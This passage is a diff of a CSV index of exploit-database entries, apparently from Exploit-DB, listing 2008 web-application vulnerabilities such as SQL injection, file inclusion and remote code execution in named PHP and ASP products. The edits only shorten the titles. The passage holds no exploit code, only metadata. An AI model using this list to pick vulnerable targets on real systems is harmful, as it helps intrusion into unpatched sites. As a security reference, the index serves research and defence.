6356,platforms/php/webapps/6356.php,"Moodle 1.8.4 - Remote Code Execution",2008-09-03,zurlich.lpt,php,webapps,0 6357,platforms/php/webapps/6357.txt,"aspwebalbum 3.2 - Arbitrary File Upload / SQL Injection / Cross-Site Scripting",2008-09-03,Alemin_Krali,php,webapps,0 6360,platforms/php/webapps/6360.txt,"TransLucid 1.75 - 'FCKeditor' Arbitrary File Upload",2008-09-03,BugReport.IR,php,webapps,0 6361,platforms/php/webapps/6361.txt,"Living Local Website - 'listtest.php' SQL Injection",2008-09-03,"Hussin X",php,webapps,0 -6362,platforms/php/webapps/6362.txt,"ACG-PTP 1.0.6 - 'adid' Parameter SQL Injection",2008-09-04,"Hussin X",php,webapps,0 +6362,platforms/php/webapps/6362.txt,"ACG-PTP 1.0.6 - 'adid' SQL Injection",2008-09-04,"Hussin X",php,webapps,0 6363,platforms/php/webapps/6363.txt,"qwicsite pro - SQL Injection / Cross-Site Scripting",2008-09-04,Cr@zy_King,php,webapps,0 -6364,platforms/php/webapps/6364.txt,"ACG-ScriptShop - 'cid' Parameter SQL Injection",2008-09-04,"Hussin X",php,webapps,0 +6364,platforms/php/webapps/6364.txt,"ACG-ScriptShop - 'cid' SQL Injection",2008-09-04,"Hussin X",php,webapps,0 6368,platforms/php/webapps/6368.php,"AWStats Totals 1.14 - 'AWStatstotals.php' Remote Code Execution",2008-09-05,"Ricardo Almeida",php,webapps,0 6369,platforms/php/webapps/6369.py,"Devalcms 1.4a - Cross-Site Scripting / Remote Code Execution",2008-09-05,"Khashayar Fereidani",php,webapps,0 -6370,platforms/php/webapps/6370.pl,"WebCMS Portal Edition - 'id' Parameter Blind SQL Injection",2008-09-05,JosS,php,webapps,0 -6371,platforms/php/webapps/6371.txt,"Vastal I-Tech Agent Zone - 'ann_id' Parameter SQL Injection",2008-09-05,"DeViL iRaQ",php,webapps,0 -6373,platforms/php/webapps/6373.txt,"Vastal I-Tech Visa Zone - 'news_id' Parameter SQL Injection",2008-09-05,"DeViL iRaQ",php,webapps,0 -6374,platforms/php/webapps/6374.txt,"Vastal I-Tech Toner Cart - 'id' Parameter SQL Injection",2008-09-05,"DeViL iRaQ",php,webapps,0 -6375,platforms/php/webapps/6375.txt,"Vastal I-Tech Share Zone - 'id' Parameter SQL Injection",2008-09-05,"DeViL iRaQ",php,webapps,0 -6376,platforms/php/webapps/6376.txt,"Vastal I-Tech DVD Zone - 'cat_id' Parameter SQL Injection",2008-09-05,"DeViL iRaQ",php,webapps,0 -6378,platforms/php/webapps/6378.txt,"Vastal I-Tech Jobs Zone - 'news_id' Parameter SQL Injection",2008-09-05,Stack,php,webapps,0 -6379,platforms/php/webapps/6379.txt,"Vastal I-Tech MMORPG Zone - 'game_id' Parameter SQL Injection",2008-09-05,Stack,php,webapps,0 -6380,platforms/php/webapps/6380.txt,"Vastal I-Tech Mag Zone - 'cat_id' Parameter SQL Injection",2008-09-05,Stack,php,webapps,0 -6381,platforms/php/webapps/6381.txt,"Vastal I-Tech Freelance Zone - 'coder_id' Parameter SQL Injection",2008-09-05,Stack,php,webapps,0 -6382,platforms/php/webapps/6382.txt,"Vastal I-Tech Cosmetics Zone - 'cat_id' Parameter SQL Injection",2008-09-05,Stack,php,webapps,0 -6383,platforms/php/webapps/6383.txt,"EsFaq 2.0 - 'idcat' Parameter SQL Injection",2008-09-05,SuB-ZeRo,php,webapps,0 -6385,platforms/php/webapps/6385.txt,"Vastal I-Tech Shaadi Zone 1.0.9 - 'tage' Parameter SQL Injection",2008-09-05,e.wiZz!,php,webapps,0 -6388,platforms/php/webapps/6388.txt,"Vastal I-Tech Dating Zone - 'fage' Parameter SQL Injection",2008-09-06,ZoRLu,php,webapps,0 +6370,platforms/php/webapps/6370.pl,"WebCMS Portal Edition - 'id' Blind SQL Injection",2008-09-05,JosS,php,webapps,0 +6371,platforms/php/webapps/6371.txt,"Vastal I-Tech Agent Zone - 'ann_id' SQL Injection",2008-09-05,"DeViL iRaQ",php,webapps,0 +6373,platforms/php/webapps/6373.txt,"Vastal I-Tech Visa Zone - 'news_id' SQL Injection",2008-09-05,"DeViL iRaQ",php,webapps,0 +6374,platforms/php/webapps/6374.txt,"Vastal I-Tech Toner Cart - 'id' SQL Injection",2008-09-05,"DeViL iRaQ",php,webapps,0 +6375,platforms/php/webapps/6375.txt,"Vastal I-Tech Share Zone - 'id' SQL Injection",2008-09-05,"DeViL iRaQ",php,webapps,0 +6376,platforms/php/webapps/6376.txt,"Vastal I-Tech DVD Zone - 'cat_id' SQL Injection",2008-09-05,"DeViL iRaQ",php,webapps,0 +6378,platforms/php/webapps/6378.txt,"Vastal I-Tech Jobs Zone - 'news_id' SQL Injection",2008-09-05,Stack,php,webapps,0 +6379,platforms/php/webapps/6379.txt,"Vastal I-Tech MMORPG Zone - 'game_id' SQL Injection",2008-09-05,Stack,php,webapps,0 +6380,platforms/php/webapps/6380.txt,"Vastal I-Tech Mag Zone - 'cat_id' SQL Injection",2008-09-05,Stack,php,webapps,0 +6381,platforms/php/webapps/6381.txt,"Vastal I-Tech Freelance Zone - 'coder_id' SQL Injection",2008-09-05,Stack,php,webapps,0 +6382,platforms/php/webapps/6382.txt,"Vastal I-Tech Cosmetics Zone - 'cat_id' SQL Injection",2008-09-05,Stack,php,webapps,0 +6383,platforms/php/webapps/6383.txt,"EsFaq 2.0 - 'idcat' SQL Injection",2008-09-05,SuB-ZeRo,php,webapps,0 +6385,platforms/php/webapps/6385.txt,"Vastal I-Tech Shaadi Zone 1.0.9 - 'tage' SQL Injection",2008-09-05,e.wiZz!,php,webapps,0 +6388,platforms/php/webapps/6388.txt,"Vastal I-Tech Dating Zone - 'fage' SQL Injection",2008-09-06,ZoRLu,php,webapps,0 6390,platforms/php/webapps/6390.txt,"Integramod 1.4.x - (Insecure Directory) Download Database",2008-09-06,TheJT,php,webapps,0 6392,platforms/php/webapps/6392.php,"Simple Machines Forum (SMF) 1.1.5 (Windows x86) - Admin Reset Password Exploit",2008-09-06,Raz0r,php,webapps,0 6393,platforms/php/webapps/6393.pl,"MemHT Portal 3.9.0 - Remote Create Shell Exploit",2008-09-06,Ams,php,webapps,0 -6395,platforms/php/webapps/6395.txt,"Masir Camp E-Shop Module 3.0 - 'ordercode' Parameter SQL Injection",2008-09-07,BugReport.IR,php,webapps,0 -6396,platforms/php/webapps/6396.txt,"Alstrasoft Forum - 'cat' Parameter SQL Injection",2008-09-07,r45c4l,php,webapps,0 +6395,platforms/php/webapps/6395.txt,"Masir Camp E-Shop Module 3.0 - 'ordercode' SQL Injection",2008-09-07,BugReport.IR,php,webapps,0 +6396,platforms/php/webapps/6396.txt,"Alstrasoft Forum - 'cat' SQL Injection",2008-09-07,r45c4l,php,webapps,0 6397,platforms/php/webapps/6397.txt,"WordPress 2.6.1 - SQL Column Truncation",2008-09-07,irk4z,php,webapps,0 6398,platforms/php/webapps/6398.txt,"E-Shop Shopping Cart Script - 'search_results.php' SQL Injection",2008-09-07,Mormoroth,php,webapps,0 -6401,platforms/php/webapps/6401.txt,"Alstrasoft Forum - 'catid' Parameter SQL Injection",2008-09-09,r45c4l,php,webapps,0 +6401,platforms/php/webapps/6401.txt,"Alstrasoft Forum - 'catid' SQL Injection",2008-09-09,r45c4l,php,webapps,0 6402,platforms/php/webapps/6402.txt,"Stash 1.0.3 - Multiple SQL Injections",2008-09-09,"Khashayar Fereidani",php,webapps,0 6403,platforms/php/webapps/6403.txt,"Hot Links SQL-PHP 3 - 'report.php' Multiple Vulnerabilities",2008-09-09,sl4xUz,php,webapps,0 6404,platforms/php/webapps/6404.txt,"Live TV Script - 'index.php mid' SQL Injection",2008-09-09,InjEctOr5,php,webapps,0 -6405,platforms/asp/webapps/6405.txt,"Creator CMS 5.0 - 'sideid' Parameter SQL Injection",2008-09-09,"ThE X-HaCkEr",asp,webapps,0 +6405,platforms/asp/webapps/6405.txt,"Creator CMS 5.0 - 'sideid' SQL Injection",2008-09-09,"ThE X-HaCkEr",asp,webapps,0 6406,platforms/php/webapps/6406.txt,"Stash 1.0.3 - Insecure Cookie Handling",2008-09-09,Ciph3r,php,webapps,0 -6408,platforms/php/webapps/6408.txt,"CMS Buzz - 'id' Parameter SQL Injection",2008-09-09,"security fears team",php,webapps,0 +6408,platforms/php/webapps/6408.txt,"CMS Buzz - 'id' SQL Injection",2008-09-09,"security fears team",php,webapps,0 6409,platforms/php/webapps/6409.txt,"AvailScript Article Script - 'articles.php' Multiple Vulnerabilities",2008-09-09,sl4xUz,php,webapps,0 6410,platforms/php/webapps/6410.txt,"Kim Websites 1.0 - 'FCKeditor' Arbitrary File Upload",2008-09-09,Ciph3r,php,webapps,0 6411,platforms/php/webapps/6411.txt,"AvailScript Photo Album - 'pics.php' Multiple Vulnerabilities",2008-09-09,sl4xUz,php,webapps,0 6412,platforms/php/webapps/6412.txt,"AvailScript Classmate Script - 'viewprofile.php' SQL Injection",2008-09-09,Stack,php,webapps,0 -6413,platforms/php/webapps/6413.txt,"Zanfi CMS lite 1.2 - Multiple Local File Inclusion",2008-09-10,SirGod,php,webapps,0 +6413,platforms/php/webapps/6413.txt,"Zanfi CMS lite 1.2 - Multiple Local File Inclusions",2008-09-10,SirGod,php,webapps,0 6416,platforms/php/webapps/6416.txt,"Libera CMS 1.12 - 'cookie' SQL Injection",2008-09-10,StAkeR,php,webapps,0 -6417,platforms/php/webapps/6417.txt,"AvailScript Jobs Portal Script - 'jid' Parameter SQL Injection",2008-09-10,InjEctOr5,php,webapps,0 +6417,platforms/php/webapps/6417.txt,"AvailScript Jobs Portal Script - 'jid' SQL Injection",2008-09-10,InjEctOr5,php,webapps,0 6419,platforms/php/webapps/6419.txt,"Zanfi CMS lite 2.1 / Jaw Portal free - 'FCKeditor' Arbitrary File Upload",2008-09-10,reptil,php,webapps,0 6420,platforms/asp/webapps/6420.txt,"aspwebalbum 3.2 - Multiple Vulnerabilities",2008-09-10,e.wiZz!,asp,webapps,0 6421,platforms/php/webapps/6421.php,"WordPress 2.6.1 - SQL Column Truncation Admin Takeover Exploit",2008-09-10,iso^kpsbr,php,webapps,0 6422,platforms/php/webapps/6422.txt,"PHPVID 1.1 - Cross-Site Scripting / SQL Injection",2008-09-10,r45c4l,php,webapps,0 -6423,platforms/php/webapps/6423.txt,"Zanfi CMS lite / Jaw Portal free - 'page' Parameter SQL Injection",2008-09-10,Cru3l.b0y,php,webapps,0 +6423,platforms/php/webapps/6423.txt,"Zanfi CMS lite / Jaw Portal free - 'page' SQL Injection",2008-09-10,Cru3l.b0y,php,webapps,0 6425,platforms/php/webapps/6425.txt,"PHPWebGallery 1.3.4 - Cross-Site Scripting / Local File Inclusion",2008-09-11,"Khashayar Fereidani",php,webapps,0 -6426,platforms/php/webapps/6426.txt,"Autodealers CMS AutOnline - 'pageid' Parameter SQL Injection",2008-09-11,r45c4l,php,webapps,0 -6427,platforms/php/webapps/6427.txt,"Sports Clubs Web Panel 0.0.1 - 'p' Parameter Local File Inclusion",2008-09-11,StAkeR,php,webapps,0 +6426,platforms/php/webapps/6426.txt,"Autodealers CMS AutOnline - 'pageid' SQL Injection",2008-09-11,r45c4l,php,webapps,0 +6427,platforms/php/webapps/6427.txt,"Sports Clubs Web Panel 0.0.1 - 'p' Local File Inclusion",2008-09-11,StAkeR,php,webapps,0 6428,platforms/php/webapps/6428.pl,"Easy Photo Gallery 2.1 - Cross-Site Scripting / File Disclosure/Bypass / SQL Injection",2008-09-11,"Khashayar Fereidani",php,webapps,0 -6430,platforms/php/webapps/6430.txt,"D-iscussion Board 3.01 - 'topic' Parameter Local File Inclusion",2008-09-11,SirGod,php,webapps,0 +6430,platforms/php/webapps/6430.txt,"D-iscussion Board 3.01 - 'topic' Local File Inclusion",2008-09-11,SirGod,php,webapps,0 6431,platforms/php/webapps/6431.pl,"phsBlog 0.2 - Bypass SQL Injection Filtering Exploit",2008-09-11,"Khashayar Fereidani",php,webapps,0 6432,platforms/php/webapps/6432.py,"minb 0.1.0 - Remote Code Execution",2008-09-11,"Khashayar Fereidani",php,webapps,0 -6433,platforms/php/webapps/6433.txt,"Autodealers CMS AutOnline - 'id' Parameter SQL Injection",2008-09-11,ZoRLu,php,webapps,0 -6435,platforms/php/webapps/6435.txt,"Sports Clubs Web Panel 0.0.1 - 'id' Parameter SQL Injection",2008-09-11,"Virangar Security",php,webapps,0 +6433,platforms/php/webapps/6433.txt,"Autodealers CMS AutOnline - 'id' SQL Injection",2008-09-11,ZoRLu,php,webapps,0 +6435,platforms/php/webapps/6435.txt,"Sports Clubs Web Panel 0.0.1 - 'id' SQL Injection",2008-09-11,"Virangar Security",php,webapps,0 6436,platforms/php/webapps/6436.txt,"PHPWebGallery 1.3.4 - Blind SQL Injection (1)",2008-09-11,Stack,php,webapps,0 6437,platforms/php/webapps/6437.txt,"Easy Photo Gallery 2.1 - Arbitrary Add Admin / remove user",2008-09-11,Stack,php,webapps,0 6438,platforms/php/webapps/6438.pl,"Yourownbux 4.0 - 'cookie' Authentication Bypass",2008-09-11,Tec-n0x,php,webapps,0 @@ -20208,16 +20209,16 @@ id,file,description,date,author,platform,type,port 6440,platforms/php/webapps/6440.pl,"PHPWebGallery 1.3.4 - Blind SQL Injection (2)",2008-09-12,ka0x,php,webapps,0 6442,platforms/php/webapps/6442.txt,"pForum 1.30 - 'showprofil.php' SQL Injection",2008-09-12,tmh,php,webapps,0 6443,platforms/php/webapps/6443.pl,"WebPortal CMS 0.7.4 - 'download.php' SQL Injection",2008-09-12,StAkeR,php,webapps,0 -6444,platforms/php/webapps/6444.txt,"iBoutique 4.0 - 'cat' Parameter SQL Injection",2008-09-12,r45c4l,php,webapps,0 +6444,platforms/php/webapps/6444.txt,"iBoutique 4.0 - 'cat' SQL Injection",2008-09-12,r45c4l,php,webapps,0 6445,platforms/php/webapps/6445.txt,"SkaLinks 1.5 - 'register.php' Arbitrary Add Editor",2008-09-12,mr.al7rbi,php,webapps,0 -6446,platforms/php/webapps/6446.txt,"vbLOGIX Tutorial Script 1.0 - 'cat_id' Parameter SQL Injection",2008-09-12,FIREH4CK3R,php,webapps,0 -6447,platforms/php/webapps/6447.txt,"pNews 2.03 - 'newsid' Parameter SQL Injection",2008-09-12,r45c4l,php,webapps,0 +6446,platforms/php/webapps/6446.txt,"vbLOGIX Tutorial Script 1.0 - 'cat_id' SQL Injection",2008-09-12,FIREH4CK3R,php,webapps,0 +6447,platforms/php/webapps/6447.txt,"pNews 2.03 - 'newsid' SQL Injection",2008-09-12,r45c4l,php,webapps,0 6448,platforms/php/webapps/6448.txt,"WebPortal CMS 0.7.4 - 'FCKeditor' Arbitrary File Upload",2008-09-12,S.W.A.T.,php,webapps,0 6449,platforms/php/webapps/6449.php,"pLink 2.07 - 'linkto.php' Blind SQL Injection",2008-09-13,Stack,php,webapps,0 6450,platforms/php/webapps/6450.pl,"Sports Clubs Web Panel 0.0.1 - Remote Game Delete Exploit",2008-09-13,ka0x,php,webapps,0 6451,platforms/php/webapps/6451.txt,"Talkback 2.3.6 - Multiple Local File Inclusion / PHPInfo Disclosure Vulnerabilities",2008-09-13,SirGod,php,webapps,0 6452,platforms/php/webapps/6452.txt,"phpsmartcom 0.2 - Local File Inclusion / SQL Injection",2008-09-13,r3dm0v3,php,webapps,0 -6453,platforms/asp/webapps/6453.txt,"FoT Video scripti 1.1b - 'oyun' Parameter SQL Injection",2008-09-13,Crackers_Child,asp,webapps,0 +6453,platforms/asp/webapps/6453.txt,"FoT Video scripti 1.1b - 'oyun' SQL Injection",2008-09-13,Crackers_Child,asp,webapps,0 6455,platforms/php/webapps/6455.txt,"Linkarity - 'link.php' SQL Injection",2008-09-13,"Egypt Coder",php,webapps,0 6456,platforms/php/webapps/6456.txt,"Free PHP VX Guestbook 1.06 - Arbitrary Database Backup",2008-09-13,SirGod,php,webapps,0 6457,platforms/php/webapps/6457.txt,"Free PHP VX Guestbook 1.06 - Insecure Cookie Handling",2008-09-14,Stack,php,webapps,0 @@ -20227,21 +20228,21 @@ id,file,description,date,author,platform,type,port 6464,platforms/php/webapps/6464.txt,"CzarNews 1.20 - Account Hijacking SQL Injection",2008-09-15,0ut0fbound,php,webapps,0 6465,platforms/php/webapps/6465.txt,"Pre Real Estate Listings - 'search.php' SQL Injection",2008-09-15,JosS,php,webapps,0 6466,platforms/php/webapps/6466.txt,"Link Bid Script 1.5 - Multiple SQL Injections",2008-09-15,SirGod,php,webapps,0 -6467,platforms/php/webapps/6467.txt,"iScripts EasyIndex - 'produid' Parameter SQL Injection",2008-09-16,SirGod,php,webapps,0 +6467,platforms/php/webapps/6467.txt,"iScripts EasyIndex - 'produid' SQL Injection",2008-09-16,SirGod,php,webapps,0 6468,platforms/php/webapps/6468.txt,"Attachmax Dolphin 2.1.0 - Multiple Vulnerabilities",2008-09-16,K-159,php,webapps,0 6469,platforms/php/webapps/6469.txt,"Gonafish LinksCaffePRO 4.5 - 'index.php' SQL Injection",2008-09-16,sl4xUz,php,webapps,0 6470,platforms/asp/webapps/6470.txt,"Hotel Reservation System - 'city.asp' Blind SQL Injection",2008-09-16,JosS,asp,webapps,0 -6473,platforms/php/webapps/6473.txt,"phpRealty 0.3 - 'INC' Parameter Remote File Inclusion",2008-09-17,ka0x,php,webapps,0 +6473,platforms/php/webapps/6473.txt,"phpRealty 0.3 - 'INC' Remote File Inclusion",2008-09-17,ka0x,php,webapps,0 6475,platforms/php/webapps/6475.txt,"PHP Crawler 0.8 - Remote File Inclusion",2008-09-17,Piker,php,webapps,0 -6478,platforms/php/webapps/6478.txt,"Technote 7 - 'shop_this_skin_path' Parameter Remote File Inclusion",2008-09-17,webDEViL,php,webapps,0 +6478,platforms/php/webapps/6478.txt,"Technote 7 - 'shop_this_skin_path' Remote File Inclusion",2008-09-17,webDEViL,php,webapps,0 6480,platforms/php/webapps/6480.txt,"X10media Mp3 Search Engine 1.5.5 - Remote File Inclusion",2008-09-17,THUNDER,php,webapps,0 6482,platforms/php/webapps/6482.txt,"addalink 4 Beta - Write Approved Links Remote",2008-09-17,Pepelux,php,webapps,0 6483,platforms/php/webapps/6483.txt,"E-PHP CMS - 'article.php' SQL Injection",2008-09-18,HaCkeR_EgY,php,webapps,0 -6485,platforms/php/webapps/6485.txt,"addalink 4 - 'category_id' Parameter SQL Injection",2008-09-18,ka0x,php,webapps,0 -6486,platforms/php/webapps/6486.txt,"ProArcadeScript 1.3 - 'random' Parameter SQL Injection",2008-09-18,SuNHouSe2,php,webapps,0 -6487,platforms/php/webapps/6487.txt,"CYASK 3.x - 'neturl' Parameter Local File Disclosure",2008-09-18,xy7,php,webapps,0 +6485,platforms/php/webapps/6485.txt,"addalink 4 - 'category_id' SQL Injection",2008-09-18,ka0x,php,webapps,0 +6486,platforms/php/webapps/6486.txt,"ProArcadeScript 1.3 - 'random' SQL Injection",2008-09-18,SuNHouSe2,php,webapps,0 +6487,platforms/php/webapps/6487.txt,"CYASK 3.x - 'neturl' Local File Disclosure",2008-09-18,xy7,php,webapps,0 6488,platforms/php/webapps/6488.txt,"Diesel Joke Site - 'picture_category.php' SQL Injection",2008-09-18,SarBoT511,php,webapps,0 -6489,platforms/php/webapps/6489.txt,"ProActive CMS - 'template' Parameter Local File Inclusion",2008-09-18,r45c4l,php,webapps,0 +6489,platforms/php/webapps/6489.txt,"ProActive CMS - 'template' Local File Inclusion",2008-09-18,r45c4l,php,webapps,0 6490,platforms/php/webapps/6490.txt,"AssetMan 2.5-b - SQL Injection using Session Fixation",2008-09-18,"Neo Anderson",php,webapps,0 6492,platforms/php/webapps/6492.php,"Pluck CMS 4.5.3 - 'update.php' Remote File Corruption Exploit",2008-09-19,Nine:Situations:Group,php,webapps,0 6494,platforms/php/webapps/6494.txt,"easyLink 1.1.0 - 'detail.php' SQL Injection",2008-09-19,"Egypt Coder",php,webapps,0 @@ -20249,16 +20250,16 @@ id,file,description,date,author,platform,type,port 6499,platforms/php/webapps/6499.txt,"Advanced Electron Forum 1.0.6 - Remote Code Execution",2008-09-20,"GulfTech Security",php,webapps,0 6500,platforms/php/webapps/6500.txt,"Explay CMS 2.1 - Insecure Cookie Handling",2008-09-20,Stack,php,webapps,0 6501,platforms/php/webapps/6501.txt,"MyFWB 1.0 - 'index.php' SQL Injection",2008-09-20,0x90,php,webapps,0 -6502,platforms/php/webapps/6502.txt,"Diesel Pay Script - 'area' Parameter SQL Injection",2008-09-20,ZoRLu,php,webapps,0 -6503,platforms/php/webapps/6503.txt,"Plaincart 1.1.2 - 'p' Parameter SQL Injection",2008-09-20,r45c4l,php,webapps,0 +6502,platforms/php/webapps/6502.txt,"Diesel Pay Script - 'area' SQL Injection",2008-09-20,ZoRLu,php,webapps,0 +6503,platforms/php/webapps/6503.txt,"Plaincart 1.1.2 - 'p' SQL Injection",2008-09-20,r45c4l,php,webapps,0 6504,platforms/php/webapps/6504.txt,"Oceandir 2.9 - 'show_vote.php' SQL Injection",2008-09-20,"JEEN HACKER TEAM",php,webapps,0 6505,platforms/php/webapps/6505.txt,"jPORTAL 2 - 'humor.php' SQL Injection",2008-09-20,r45c4l,php,webapps,0 6507,platforms/php/webapps/6507.php,"Invision Power Board 2.3.5 - SQL Injection",2008-09-21,waraxe,php,webapps,0 6508,platforms/php/webapps/6508.txt,"Basic PHP Events Lister 1.0 - SQL Injection",2008-09-21,0x90,php,webapps,0 6509,platforms/cgi/webapps/6509.txt,"TWiki 4.2.2 - 'action' Remote Code Execution",2008-09-21,webDEViL,cgi,webapps,0 6510,platforms/php/webapps/6510.txt,"PHPKB 1.5 Professional - Multiple SQL Injections",2008-09-21,d3v1l,php,webapps,0 -6511,platforms/php/webapps/6511.txt,"6rbScript 3.3 - 'singerid' Parameter SQL Injection",2008-09-21,"Hussin X",php,webapps,0 -6512,platforms/php/webapps/6512.txt,"Diesel Job Site - 'job_id' Parameter Blind SQL Injection",2008-09-21,Stack,php,webapps,0 +6511,platforms/php/webapps/6511.txt,"6rbScript 3.3 - 'singerid' SQL Injection",2008-09-21,"Hussin X",php,webapps,0 +6512,platforms/php/webapps/6512.txt,"Diesel Job Site - 'job_id' Blind SQL Injection",2008-09-21,Stack,php,webapps,0 6513,platforms/php/webapps/6513.txt,"Rianxosencabos CMS 0.9 - Arbitrary Add Admin",2008-09-21,"CWH Underground",php,webapps,0 6514,platforms/php/webapps/6514.txt,"AvailScript Jobs Portal Script - Authenticated Arbitrary File Upload",2008-09-21,InjEctOr5,php,webapps,0 6516,platforms/php/webapps/6516.txt,"e107 Plugin Image Gallery 0.9.6.2 - SQL Injection",2008-09-21,boom3rang,php,webapps,0 @@ -20272,38 +20273,38 @@ id,file,description,date,author,platform,type,port 6524,platforms/php/webapps/6524.txt,"WSN Links 2.22/2.23 - 'vote.php' SQL Injection",2008-09-22,d3v1l,php,webapps,0 6525,platforms/php/webapps/6525.txt,"WSN Links 2.20 - 'comments.php' SQL Injection",2008-09-22,d3v1l,php,webapps,0 6526,platforms/php/webapps/6526.txt,"PHP iCalendar 2.24 - Insecure Cookie Handling",2008-09-22,Stack,php,webapps,0 -6527,platforms/php/webapps/6527.txt,"BuzzyWall 1.3.1 - 'search' Parameter SQL Injection",2008-09-22,~!Dok_tOR!~,php,webapps,0 +6527,platforms/php/webapps/6527.txt,"BuzzyWall 1.3.1 - 'search' SQL Injection",2008-09-22,~!Dok_tOR!~,php,webapps,0 6528,platforms/php/webapps/6528.txt,"WCMS 1.0b - 'news_detail.asp' SQL Injection",2008-09-22,"CWH Underground",php,webapps,0 6529,platforms/php/webapps/6529.php,"WSN Links Free 4.0.34P - 'comments.php' Blind SQL Injection",2008-09-22,Stack,php,webapps,0 -6530,platforms/php/webapps/6530.txt,"OpenElec 3.01 - 'obj' Parameter Local File Inclusion",2008-09-22,dun,php,webapps,0 +6530,platforms/php/webapps/6530.txt,"OpenElec 3.01 - 'obj' Local File Inclusion",2008-09-22,dun,php,webapps,0 6531,platforms/php/webapps/6531.txt,"MyBlog 0.9.8 - Insecure Cookie Handling",2008-09-22,Pepelux,php,webapps,0 6533,platforms/php/webapps/6533.txt,"basebuilder 2.0.1 - 'main.inc.php' Remote File Inclusion",2008-09-22,dun,php,webapps,0 6535,platforms/php/webapps/6535.txt,"Fez 1.3/2.0 RC1 - 'list.php' SQL Injection",2008-09-22,d3v1l,php,webapps,0 6536,platforms/php/webapps/6536.pl,"CJ Ultra Plus 1.0.4 - Cookie SQL Injection",2008-09-22,-SmoG-,php,webapps,0 -6538,platforms/php/webapps/6538.txt,"OpenRat 0.8-beta4 - 'tpl_dir' Parameter Remote File Inclusion",2008-09-23,dun,php,webapps,0 -6539,platforms/php/webapps/6539.txt,"Sofi WebGui 0.6.3 PRE - 'mod_dir' Parameter Remote File Inclusion",2008-09-23,dun,php,webapps,0 +6538,platforms/php/webapps/6538.txt,"OpenRat 0.8-beta4 - 'tpl_dir' Remote File Inclusion",2008-09-23,dun,php,webapps,0 +6539,platforms/php/webapps/6539.txt,"Sofi WebGui 0.6.3 PRE - 'mod_dir' Remote File Inclusion",2008-09-23,dun,php,webapps,0 6540,platforms/php/webapps/6540.pl,"iGaming CMS 1.5 - Multiple SQL Injections",2008-09-23,StAkeR,php,webapps,0 6541,platforms/php/webapps/6541.txt,"Galmeta Post CMS 0.2 - Remote Code Execution / Arbitrary File Upload",2008-09-23,GoLd_M,php,webapps,0 -6542,platforms/php/webapps/6542.txt,"JETIK-WEB Software - 'kat' Parameter SQL Injection",2008-09-23,d3v1l,php,webapps,0 +6542,platforms/php/webapps/6542.txt,"JETIK-WEB Software - 'kat' SQL Injection",2008-09-23,d3v1l,php,webapps,0 6543,platforms/php/webapps/6543.txt,"Ol BookMarks Manager 0.7.5 - Local File Inclusion",2008-09-23,dun,php,webapps,0 -6544,platforms/php/webapps/6544.txt,"WebPortal CMS 0.7.4 - 'code' Parameter Remote Code Execution",2008-09-23,GoLd_M,php,webapps,0 -6545,platforms/php/webapps/6545.txt,"HotScripts Clone - 'cid' Parameter SQL Injection",2008-09-24,"Hussin X",php,webapps,0 +6544,platforms/php/webapps/6544.txt,"WebPortal CMS 0.7.4 - 'code' Remote Code Execution",2008-09-23,GoLd_M,php,webapps,0 +6545,platforms/php/webapps/6545.txt,"HotScripts Clone - 'cid' SQL Injection",2008-09-24,"Hussin X",php,webapps,0 6546,platforms/php/webapps/6546.pl,"Rianxosencabos CMS 0.9 - Remote Add Admin",2008-09-24,ka0x,php,webapps,0 6547,platforms/php/webapps/6547.txt,"Ol BookMarks Manager 0.7.5 - Local File Inclusion / Remote File Inclusion / SQL Injection",2008-09-24,GoLd_M,php,webapps,0 6549,platforms/php/webapps/6549.txt,"Jetik Emlak ESA 2.0 - Multiple SQL Injections",2008-09-24,ZoRLu,php,webapps,0 -6550,platforms/php/webapps/6550.txt,"AJ Auction Pro Platinum Skin - 'item_id' Parameter SQL Injection",2008-09-24,GoLd_M,php,webapps,0 -6551,platforms/php/webapps/6551.txt,"emergecolab 1.0 - 'sitecode' Parameter Local File Inclusion",2008-09-24,dun,php,webapps,0 -6552,platforms/php/webapps/6552.txt,"mailwatch 1.0.4 - 'doc' Parameter Local File Inclusion",2008-09-24,dun,php,webapps,0 +6550,platforms/php/webapps/6550.txt,"AJ Auction Pro Platinum Skin - 'item_id' SQL Injection",2008-09-24,GoLd_M,php,webapps,0 +6551,platforms/php/webapps/6551.txt,"emergecolab 1.0 - 'sitecode' Local File Inclusion",2008-09-24,dun,php,webapps,0 +6552,platforms/php/webapps/6552.txt,"mailwatch 1.0.4 - 'doc' Local File Inclusion",2008-09-24,dun,php,webapps,0 6553,platforms/php/webapps/6553.txt,"PHPcounter 1.3.2 - 'defs.php' Local File Inclusion",2008-09-24,dun,php,webapps,0 6555,platforms/php/webapps/6555.txt,"Jadu CMS for Government - 'recruit_details.php' SQL Injection",2008-09-24,r45c4l,php,webapps,0 -6556,platforms/php/webapps/6556.txt,"webcp 0.5.7 - 'filelocation' Parameter Remote File Disclosure",2008-09-24,GoLd_M,php,webapps,0 +6556,platforms/php/webapps/6556.txt,"webcp 0.5.7 - 'filelocation' Remote File Disclosure",2008-09-24,GoLd_M,php,webapps,0 6557,platforms/php/webapps/6557.txt,"ADN Forum 1.0b - Insecure Cookie Handling",2008-09-24,Pepelux,php,webapps,0 6558,platforms/php/webapps/6558.txt,"barcodegen 2.0.0 - Local File Inclusion",2008-09-24,dun,php,webapps,0 6559,platforms/php/webapps/6559.txt,"Observer 0.3.2.1 - Multiple Remote Command Execution Vulnerabilities",2008-09-24,dun,php,webapps,0 -6561,platforms/php/webapps/6561.txt,"AJ Auction Pro Platinum - 'seller_id' Parameter SQL Injection",2008-09-25,InjEctOr5,php,webapps,0 -6562,platforms/php/webapps/6562.txt,"LanSuite 3.3.2 - 'design' Parameter Local File Inclusion",2008-09-25,dun,php,webapps,0 -6563,platforms/php/webapps/6563.txt,"PHPOCS 0.1-beta3 - 'act' Parameter Local File Inclusion",2008-09-25,dun,php,webapps,0 -6564,platforms/php/webapps/6564.txt,"Vikingboard 0.2 Beta - 'task' Parameter Local File Inclusion",2008-09-25,dun,php,webapps,0 +6561,platforms/php/webapps/6561.txt,"AJ Auction Pro Platinum - 'seller_id' SQL Injection",2008-09-25,InjEctOr5,php,webapps,0 +6562,platforms/php/webapps/6562.txt,"LanSuite 3.3.2 - 'design' Local File Inclusion",2008-09-25,dun,php,webapps,0 +6563,platforms/php/webapps/6563.txt,"PHPOCS 0.1-beta3 - 'act' Local File Inclusion",2008-09-25,dun,php,webapps,0 +6564,platforms/php/webapps/6564.txt,"Vikingboard 0.2 Beta - 'task' Local File Inclusion",2008-09-25,dun,php,webapps,0 6566,platforms/php/webapps/6566.txt,"PHP infoboard 7 plus - Multiple Vulnerabilities",2008-09-25,"CWH 